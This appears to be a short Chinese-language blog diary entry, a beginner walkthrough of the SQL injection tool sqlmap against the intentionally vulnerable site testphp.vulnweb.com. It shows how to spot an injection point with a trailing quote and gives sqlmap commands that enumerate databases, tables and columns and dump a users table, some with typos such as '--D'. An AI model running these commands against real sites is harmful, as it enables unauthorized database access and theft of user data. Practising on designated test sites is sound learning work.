sqlmap

是一個sql檢測工具

日記
本來是想寫bbqsql的但是昨天明明測試還好的
今天一打開卻出現錯誤...
重裝好多次
弄到最後還是modulerror QAQ
只好隨便找一個一樣是sql系列的來充數

首先,找一個專門提供測試的網站～
隨便找網站測試會被警察抓走的！！被抓走不負責！！！

之後要找注入點
就是當一個包含id的網址,當你把它後面加'符號時會吐SQL錯誤,它就是有弱點
ex:
http://testphp.vulnweb.com/artists.php?artist=1
變加上'
http://testphp.vulnweb.com/artists.php?artist=1'

在裡面輸入
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --dbs
它就會開始跑了

看到這一行就代表選對了id

其中它跳出了兩個問題給我

第一個是發現該系統是MySQL問我是否放棄測試其他的DBSM
第二個是是否加深risk和value 越高越花時間～

可以發現他有兩個database
選擇一個進去看
sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --D acuart --tables

發現有users這個項目

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 --D acuart -T users --columns

可以發現裡面包含了許多項目
隨機挑一個測試就可以叫出來裡面的資料了

sqlmap -u http://testphp.vulnweb.com/artists.php?artist=1 -D acuart -T users -C ID --dump

滿好玩的一個工具,就算沒弄懂原理也可以小小滿足一下當個skiddie的快感

參考資料:https://www.youtube.com/watch?v=OlL6IdSMImA
http://shadownull.blogspot.com/2015/08/sql-injection-tutorial.html
http://xdeath.dyndns.pro/read.php?69
https://www.ichiayi.com/wiki/tech/sqlmap
https://linuxtrack.net/viewtopic.php?id=1074